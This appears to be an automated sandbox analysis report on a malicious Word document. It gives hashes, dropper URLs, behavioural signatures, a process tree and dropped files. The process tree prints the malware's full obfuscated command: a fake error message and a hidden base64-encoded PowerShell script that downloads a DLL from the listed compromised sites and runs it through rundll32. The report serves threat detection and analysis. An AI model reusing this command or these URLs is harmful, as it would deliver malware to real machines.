Analysis

  • max time kernel
    107s
  • max time network
    50s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    22-05-2022 05:25

General

  • Target

    fzivjgfe.doc

  • Size

    154KB

  • MD5

    40f79fcaa6e497435e1ac54f87fe90ab

  • SHA1

    41acbe1239d7c21c6919033da6fd935db6ee1f58

  • SHA256

    43af38ecd27585f00463abfee0ca7f492fb36fa862c8d215447d59be27652589

  • SHA512

    93e3876bf713ea07d0302cc2f3432c0aa0365e2d3a5d2babe751a198fde4a0c9b4a080804166485e2843a0ec7e071b7748126bdd7d79472ede19c9fad3688d7a

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://mediatorstewart.com/service-msc/3zZLr/

exe.dropper

http://wolffsachs.com/wp-content/UKZw/

exe.dropper

http://ycspreview.com/shubham/h7qna/

exe.dropper

http://wi360.com/wp-content/u/

exe.dropper

http://linkejet.com.br/cgi-bin/UQ/

exe.dropper

http://nuocmambamuoi.vn/wp-admin/Ty/

exe.dropper

http://ellinismos1922.gr/log/c99FG/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 10 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fzivjgfe.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:560
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1632
    • C:\Windows\system32\cmd.exe
      cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JABTAG8AOQBSAHEAIAAgAD0AIAAgAFsAVAB5AFAAZQBdACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQB7ADQAfQAiAC0ARgAgACcALgBpAE8ALgBkAEkAUgBFAEMAJwAsACcARQAnACwAJwBNACcALAAnAHMAeQBzAHQAJwAsACcAdABvAHIAWQAnACkAOwAgACAAIAAgACQAeQB4AE4AdAA2AG0APQBbAFQAWQBQAEUAXQAoACIAewAyAH0AewA1AH0AewAzAH0AewAxAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE0AQQBuAEEARwBlACcALAAnAE8ASQBOAFQAJwAsACcAcwB5AHMAdABlAE0ALgBOAGUAVAAuACcALAAnAEMAZQBwACcALAAnAHIAJwAsACcAUwBlAFIAVgBpACcAKQA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAJwArACcAbwBuACcAKQArACgAJwB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAFQANQB1ADEAawAyAHQAPQAkAEwAMwAwAEcAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEMAMwAwAEkAOwAkAEUAXwAzAFkAPQAoACcAWAA4ACcAKwAnADAARwAnACkAOwAgACgAIAAgAFYAQQBSAEkAQQBCAGwAZQAgACgAJwBzAG8AOQByACcAKwAnAFEAJwApACAALQB2AGEAbABVAGUAbwBuACkAOgA6ACIAQwBSAGAAZQBBAHQARQBgAGQAaQBgAFIAYABlAGMAVABvAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AEkAJwArACgAJwAxADAAJwArACcAcAAwACcAKQArACcAegBzAHsAMAB9ACcAKwAnAEIAdABqAGcAaABxAGYAewAnACsAJwAwAH0AJwApAC0ARgAgACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQARQA0ADAASgA9ACgAJwBHADkAJwArACcAMgBPACcAKQA7ACAAIAAkAFkAeABOAHQANgBNADoAOgAiAFMAZQBgAEMAdQBgAFIAaQB0AHkAcABSAG8AVABvAGAAYwBgAG8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQAWQA0ADgASwA9ACgAKAAnAEIAMAAnACsAJwA0ACcAKQArACcARgAnACkAOwAkAEIAcAB0ADcAeQA1AHoAIAA9ACAAKAAoACcATQAnACsAJwAyADEAJwApACsAJwBZACcAKQA7ACQATgAxADIAUQA9ACgAKAAnAE0AJwArACcANAAyACcAKQArACcAUgAnACkAOwAkAFEAaQB4AHcAaABmADIAPQAkAEgATwBNAEUAKwAoACgAJwBzACcAKwAnAHoAJwArACcASgAnACsAJwBJADEAJwArACgAJwAwACcAKwAnAHAAMAB6AHMAJwApACsAKAAnAHMAJwArACcAegBKACcAKwAnAEIAdABqAGcAaAAnACsAJwBxACcAKQArACgAJwBmAHMAJwArACcAegBKACcAKQApACAAIAAtAEMAcgBFAHAATABBAEMAZQAgACgAWwBDAEgAYQByAF0AMQAxADUAKwBbAEMASABhAHIAXQAxADIAMgArAFsAQwBIAGEAcgBdADcANAApACwAWwBDAEgAYQByAF0AOQAyACkAKwAkAEIAcAB0ADcAeQA1AHoAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABDADUANgBJAD0AKAAoACcASAAnACsAJwAxADMAJwApACsAJwBWACcAKQA7ACQASABnAGIAMAB5AGIAMAA9ACgAJwBdACcAKwAoACcAZQAnACsAJwAxAHIAJwApACsAKAAnAFsAUwAnACsAJwA6AC8ALwAnACsAJwBtAGUAJwApACsAJwBkAGkAJwArACgAJwBhAHQAbwAnACsAJwByAHMAdABlACcAKwAnAHcAYQAnACkAKwAnAHIAJwArACcAdAAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AJwArACcAcwBlACcAKQArACgAJwByAHYAaQBjACcAKwAnAGUALQBtACcAKwAnAHMAYwAnACkAKwAoACcALwAnACsAJwAzAHoAWgBMAHIALwAnACsAJwBAACcAKQArACcAXQAnACsAKAAnAGUAMQByAFsAUwAnACsAJwA6ACcAKQArACgAJwAvAC8AdwAnACsAJwBvAGwAJwApACsAKAAnAGYAJwArACcAZgBzAGEAYwBoACcAKQArACgAJwBzAC4AYwAnACsAJwBvAG0AJwArACcALwB3ACcAKQArACcAcAAtACcAKwAnAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwBVAEsAJwArACcAWgAnACkAKwAnAHcALwAnACsAJwBAAF0AJwArACgAJwBlACcAKwAnADEAcgBbACcAKQArACcAUwAnACsAKAAnADoAJwArACcALwAnACsAJwAvAHkAYwBzACcAKQArACcAcAByACcAKwAnAGUAJwArACgAJwB2ACcAKwAnAGkAZQB3AC4AJwApACsAKAAnAGMAJwArACcAbwBtACcAKQArACcALwBzACcAKwAnAGgAJwArACcAdQBiACcAKwAoACcAaABhAG0ALwBoADcAJwArACcAcQBuACcAKQArACgAJwBhAC8AJwArACcAQABdAGUAJwApACsAJwAxACcAKwAoACcAcgAnACsAJwBbAFMAJwArACcAOgAvAC8AdwAnACkAKwAoACcAaQAzACcAKwAnADYAJwArACcAMAAuAGMAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtAGMAJwArACcAbwBuAHQAZQBuACcAKQArACgAJwB0ACcAKwAnAC8AdQAvAEAAJwApACsAKAAnAF0AJwArACcAZQAxAHIAWwAnACsAJwBTACcAKQArACgAJwA6AC8ALwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAG4AawBlACcAKwAnAGoAJwApACsAJwBlAHQAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtACcAKwAnAC4AYgByAC8AYwBnAGkALQAnACsAJwBiACcAKQArACcAaQBuACcAKwAoACcALwBVAFEALwBAAF0AJwArACcAZQAxACcAKwAnAHIAJwArACcAWwBTADoAJwArACcALwAnACkAKwAoACcALwBuAHUAbwAnACsAJwBjACcAKQArACgAJwBtAGEAJwArACcAbQBiAGEAJwApACsAJwBtAHUAJwArACcAbwBpACcAKwAnAC4AdgAnACsAKAAnAG4AJwArACcALwB3ACcAKQArACgAJwBwACcAKwAnAC0AYQBkACcAKQArACgAJwBtACcAKwAnAGkAbgAnACkAKwAoACcALwBUAHkAJwArACcALwAnACkAKwAoACcAQABdAGUAJwArACcAMQAnACkAKwAoACcAcgBbACcAKwAnAFMAJwApACsAKAAnADoALwAvAGUAJwArACcAbABsACcAKQArACgAJwBpAG4AJwArACcAaQBzACcAKQArACcAbQBvACcAKwAoACcAcwAnACsAJwAxADkAJwApACsAJwAyACcAKwAoACcAMgAuACcAKwAnAGcAcgAvACcAKwAnAGwAbwBnAC8AJwArACcAYwA5ACcAKQArACcAOQBGACcAKwAnAEcALwAnACkALgAiAHIARQBwAGAAbABBAEMARQAiACgAKAAoACcAXQBlADEAJwArACcAcgBbACcAKQArACcAUwAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABwAEwAaQBUACIAKAAkAFcANAA5AFIAIAArACAAJABUADUAdQAxAGsAMgB0ACAAKwAgACQAQgA1ADgAQQApADsAJABCADMAMABXAD0AKAAoACcARgAnACsAJwA4ADYAJwApACsAJwBGACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBiAGYAOAA0ADMAeQAgAGkAbgAgACQASABnAGIAMAB5AGIAMAApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAcwB5AHMAdABlAE0ALgBuAGUAdAAuAFcAZQBiAEMATABJAGUAbgBUACkALgAiAGQAYABPAGAAVwBOAGwAbwBBAGQAZgBJAEwAZQAiACgAJABRAGIAZgA4ADQAMwB5ACwAIAAkAFEAaQB4AHcAaABmADIAKQA7ACQAUQAyADEATAA9ACgAJwBSADQAJwArACcAXwBZACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGkAeAB3AGgAZgAyACkALgAiAEwAZQBuAEcAYABUAEgAIgAgAC0AZwBlACAANAA5ADMAMwA4ACkAIAB7ACYAKAAnAHIAJwArACcAdQBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFEAaQB4AHcAaABmADIALAAoACgAJwBDAG8AJwArACcAbgB0AHIAbwAnACsAJwBsACcAKwAnAF8AUgAnACkAKwAnAHUAbgAnACsAKAAnAEQAJwArACcATABMACcAKQApAC4AIgB0AE8AcwBUAGAAUgBpAE4ARwAiACgAKQA7ACQAVwAzADAAUQA9ACgAKAAnAEcAJwArACcANQA5ACcAKQArACcASAAnACkAOwBiAHIAZQBhAGsAOwAkAFEAMgA4AFcAPQAoACcATAA4ACcAKwAnAF8AQgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AMQA5AEsAPQAoACcASAAnACsAKAAnADQAJwArACcANgBFACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2024
      • C:\Windows\system32\msg.exe
        msg Admin /v Word experienced an error trying to open the file.
        2⤵
          PID:1992
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POwersheLL -w hidden -ENCOD JABTAG8AOQBSAHEAIAAgAD0AIAAgAFsAVAB5AFAAZQBdACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQB7ADQAfQAiAC0ARgAgACcALgBpAE8ALgBkAEkAUgBFAEMAJwAsACcARQAnACwAJwBNACcALAAnAHMAeQBzAHQAJwAsACcAdABvAHIAWQAnACkAOwAgACAAIAAgACQAeQB4AE4AdAA2AG0APQBbAFQAWQBQAEUAXQAoACIAewAyAH0AewA1AH0AewAzAH0AewAxAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE0AQQBuAEEARwBlACcALAAnAE8ASQBOAFQAJwAsACcAcwB5AHMAdABlAE0ALgBOAGUAVAAuACcALAAnAEMAZQBwACcALAAnAHIAJwAsACcAUwBlAFIAVgBpACcAKQA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAJwArACcAbwBuACcAKQArACgAJwB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAFQANQB1ADEAawAyAHQAPQAkAEwAMwAwAEcAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEMAMwAwAEkAOwAkAEUAXwAzAFkAPQAoACcAWAA4ACcAKwAnADAARwAnACkAOwAgACgAIAAgAFYAQQBSAEkAQQBCAGwAZQAgACgAJwBzAG8AOQByACcAKwAnAFEAJwApACAALQB2AGEAbABVAGUAbwBuACkAOgA6ACIAQwBSAGAAZQBBAHQARQBgAGQAaQBgAFIAYABlAGMAVABvAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AEkAJwArACgAJwAxADAAJwArACcAcAAwACcAKQArACcAegBzAHsAMAB9ACcAKwAnAEIAdABqAGcAaABxAGYAewAnACsAJwAwAH0AJwApAC0ARgAgACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQARQA0ADAASgA9ACgAJwBHADkAJwArACcAMgBPACcAKQA7ACAAIAAkAFkAeABOAHQANgBNADoAOgAiAFMAZQBgAEMAdQBgAFIAaQB0AHkAcABSAG8AVABvAGAAYwBgAG8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQAWQA0ADgASwA9ACgAKAAnAEIAMAAnACsAJwA0ACcAKQArACcARgAnACkAOwAkAEIAcAB0ADcAeQA1AHoAIAA9ACAAKAAoACcATQAnACsAJwAyADEAJwApACsAJwBZACcAKQA7ACQATgAxADIAUQA9ACgAKAAnAE0AJwArACcANAAyACcAKQArACcAUgAnACkAOwAkAFEAaQB4AHcAaABmADIAPQAkAEgATwBNAEUAKwAoACgAJwBzACcAKwAnAHoAJwArACcASgAnACsAJwBJADEAJwArACgAJwAwACcAKwAnAHAAMAB6AHMAJwApACsAKAAnAHMAJwArACcAegBKACcAKwAnAEIAdABqAGcAaAAnACsAJwBxACcAKQArACgAJwBmAHMAJwArACcAegBKACcAKQApACAAIAAtAEMAcgBFAHAATABBAEMAZQAgACgAWwBDAEgAYQByAF0AMQAxADUAKwBbAEMASABhAHIAXQAxADIAMgArAFsAQwBIAGEAcgBdADcANAApACwAWwBDAEgAYQByAF0AOQAyACkAKwAkAEIAcAB0ADcAeQA1AHoAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABDADUANgBJAD0AKAAoACcASAAnACsAJwAxADMAJwApACsAJwBWACcAKQA7ACQASABnAGIAMAB5AGIAMAA9ACgAJwBdACcAKwAoACcAZQAnACsAJwAxAHIAJwApACsAKAAnAFsAUwAnACsAJwA6AC8ALwAnACsAJwBtAGUAJwApACsAJwBkAGkAJwArACgAJwBhAHQAbwAnACsAJwByAHMAdABlACcAKwAnAHcAYQAnACkAKwAnAHIAJwArACcAdAAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AJwArACcAcwBlACcAKQArACgAJwByAHYAaQBjACcAKwAnAGUALQBtACcAKwAnAHMAYwAnACkAKwAoACcALwAnACsAJwAzAHoAWgBMAHIALwAnACsAJwBAACcAKQArACcAXQAnACsAKAAnAGUAMQByAFsAUwAnACsAJwA6ACcAKQArACgAJwAvAC8AdwAnACsAJwBvAGwAJwApACsAKAAnAGYAJwArACcAZgBzAGEAYwBoACcAKQArACgAJwBzAC4AYwAnACsAJwBvAG0AJwArACcALwB3ACcAKQArACcAcAAtACcAKwAnAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwBVAEsAJwArACcAWgAnACkAKwAnAHcALwAnACsAJwBAAF0AJwArACgAJwBlACcAKwAnADEAcgBbACcAKQArACcAUwAnACsAKAAnADoAJwArACcALwAnACsAJwAvAHkAYwBzACcAKQArACcAcAByACcAKwAnAGUAJwArACgAJwB2ACcAKwAnAGkAZQB3AC4AJwApACsAKAAnAGMAJwArACcAbwBtACcAKQArACcALwBzACcAKwAnAGgAJwArACcAdQBiACcAKwAoACcAaABhAG0ALwBoADcAJwArACcAcQBuACcAKQArACgAJwBhAC8AJwArACcAQABdAGUAJwApACsAJwAxACcAKwAoACcAcgAnACsAJwBbAFMAJwArACcAOgAvAC8AdwAnACkAKwAoACcAaQAzACcAKwAnADYAJwArACcAMAAuAGMAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtAGMAJwArACcAbwBuAHQAZQBuACcAKQArACgAJwB0ACcAKwAnAC8AdQAvAEAAJwApACsAKAAnAF0AJwArACcAZQAxAHIAWwAnACsAJwBTACcAKQArACgAJwA6AC8ALwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAG4AawBlACcAKwAnAGoAJwApACsAJwBlAHQAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtACcAKwAnAC4AYgByAC8AYwBnAGkALQAnACsAJwBiACcAKQArACcAaQBuACcAKwAoACcALwBVAFEALwBAAF0AJwArACcAZQAxACcAKwAnAHIAJwArACcAWwBTADoAJwArACcALwAnACkAKwAoACcALwBuAHUAbwAnACsAJwBjACcAKQArACgAJwBtAGEAJwArACcAbQBiAGEAJwApACsAJwBtAHUAJwArACcAbwBpACcAKwAnAC4AdgAnACsAKAAnAG4AJwArACcALwB3ACcAKQArACgAJwBwACcAKwAnAC0AYQBkACcAKQArACgAJwBtACcAKwAnAGkAbgAnACkAKwAoACcALwBUAHkAJwArACcALwAnACkAKwAoACcAQABdAGUAJwArACcAMQAnACkAKwAoACcAcgBbACcAKwAnAFMAJwApACsAKAAnADoALwAvAGUAJwArACcAbABsACcAKQArACgAJwBpAG4AJwArACcAaQBzACcAKQArACcAbQBvACcAKwAoACcAcwAnACsAJwAxADkAJwApACsAJwAyACcAKwAoACcAMgAuACcAKwAnAGcAcgAvACcAKwAnAGwAbwBnAC8AJwArACcAYwA5ACcAKQArACcAOQBGACcAKwAnAEcALwAnACkALgAiAHIARQBwAGAAbABBAEMARQAiACgAKAAoACcAXQBlADEAJwArACcAcgBbACcAKQArACcAUwAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABwAEwAaQBUACIAKAAkAFcANAA5AFIAIAArACAAJABUADUAdQAxAGsAMgB0ACAAKwAgACQAQgA1ADgAQQApADsAJABCADMAMABXAD0AKAAoACcARgAnACsAJwA4ADYAJwApACsAJwBGACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBiAGYAOAA0ADMAeQAgAGkAbgAgACQASABnAGIAMAB5AGIAMAApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAcwB5AHMAdABlAE0ALgBuAGUAdAAuAFcAZQBiAEMATABJAGUAbgBUACkALgAiAGQAYABPAGAAVwBOAGwAbwBBAGQAZgBJAEwAZQAiACgAJABRAGIAZgA4ADQAMwB5ACwAIAAkAFEAaQB4AHcAaABmADIAKQA7ACQAUQAyADEATAA9ACgAJwBSADQAJwArACcAXwBZACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGkAeAB3AGgAZgAyACkALgAiAEwAZQBuAEcAYABUAEgAIgAgAC0AZwBlACAANAA5ADMAMwA4ACkAIAB7ACYAKAAnAHIAJwArACcAdQBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFEAaQB4AHcAaABmADIALAAoACgAJwBDAG8AJwArACcAbgB0AHIAbwAnACsAJwBsACcAKwAnAF8AUgAnACkAKwAnAHUAbgAnACsAKAAnAEQAJwArACcATABMACcAKQApAC4AIgB0AE8AcwBUAGAAUgBpAE4ARwAiACgAKQA7ACQAVwAzADAAUQA9ACgAKAAnAEcAJwArACcANQA5ACcAKQArACcASAAnACkAOwBiAHIAZQBhAGsAOwAkAFEAMgA4AFcAPQAoACcATAA4ACcAKwAnAF8AQgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AMQA5AEsAPQAoACcASAAnACsAKAAnADQAJwArACcANgBFACcAKQApAA==
          2⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:332
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\I10p0zs\Btjghqf\M21Y.dll Control_RunDLL
            3⤵
              PID:960

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Defense Evasion

        Modify Registry

        1
        T1112

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\I10p0zs\Btjghqf\M21Y.dll
          Filesize

          67KB

          MD5

          2a88b493cb6fe862b887d6316fad5a3d

          SHA1

          f15dd8ce02fba26d776cfe70f4884b84d92f3448

          SHA256

          0e56b79f74d3cb96da47d2d2dc0234b52eb9c83707d1005c2ff05740626feded

          SHA512

          62d7f0dbc915f13b100841823aad6384f66c2b06630f9bc36900a746bde7631a4ba93ff1efeecb0117394efb15d762bed9f69a2eb6250ff20f9ea4bb341a37d1

        • memory/332-66-0x00000000024FB000-0x000000000251A000-memory.dmp
          Filesize

          124KB

        • memory/332-61-0x000007FEFB7D1000-0x000007FEFB7D3000-memory.dmp
          Filesize

          8KB

        • memory/332-65-0x000000001B720000-0x000000001BA1F000-memory.dmp
          Filesize

          3.0MB

        • memory/332-63-0x000007FEF2580000-0x000007FEF30DD000-memory.dmp
          Filesize

          11.4MB

        • memory/332-64-0x00000000024F4000-0x00000000024F7000-memory.dmp
          Filesize

          12KB

        • memory/332-60-0x0000000000000000-mapping.dmp
        • memory/332-62-0x000007FEF31F0000-0x000007FEF3C13000-memory.dmp
          Filesize

          10.1MB

        • memory/560-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/560-58-0x0000000070DDD000-0x0000000070DE8000-memory.dmp
          Filesize

          44KB

        • memory/560-57-0x0000000075701000-0x0000000075703000-memory.dmp
          Filesize

          8KB

        • memory/560-54-0x0000000072371000-0x0000000072374000-memory.dmp
          Filesize

          12KB

        • memory/560-55-0x000000006FDF1000-0x000000006FDF3000-memory.dmp
          Filesize

          8KB

        • memory/560-71-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/960-69-0x0000000000000000-mapping.dmp
        • memory/1632-67-0x0000000000000000-mapping.dmp
        • memory/1992-59-0x0000000000000000-mapping.dmp